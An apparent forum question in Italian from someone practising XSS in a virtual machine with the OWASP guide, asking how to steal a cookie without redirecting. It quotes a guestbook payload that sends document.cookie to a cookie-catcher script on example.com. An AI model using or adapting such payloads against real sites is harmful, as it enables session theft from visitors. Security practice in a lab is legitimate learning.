Mi sto esercitando in VM seguendo la guida OWASP. So che è possibile rubare il cookie reindirizzando alla pagina "False" ecc. Ma vorrei rubare il cookie senza reindirizzare su un'altra pagina.
Quindi, se hai qualche libro degli ospiti e poi inserisci:
document.location= "http://www.example.com/cookie_catcher.php?c=" + document.cookie
Come posso inserirlo in una pagina esistente senza reindirizzamento?
Fondamentalmente, quello che voglio è quando qualcuno fa clic sul link, prende il cookie e lo stampa da qualche parte sulla pagina corrente. Forse in qualche tag alt
o altro.
Qualche idea?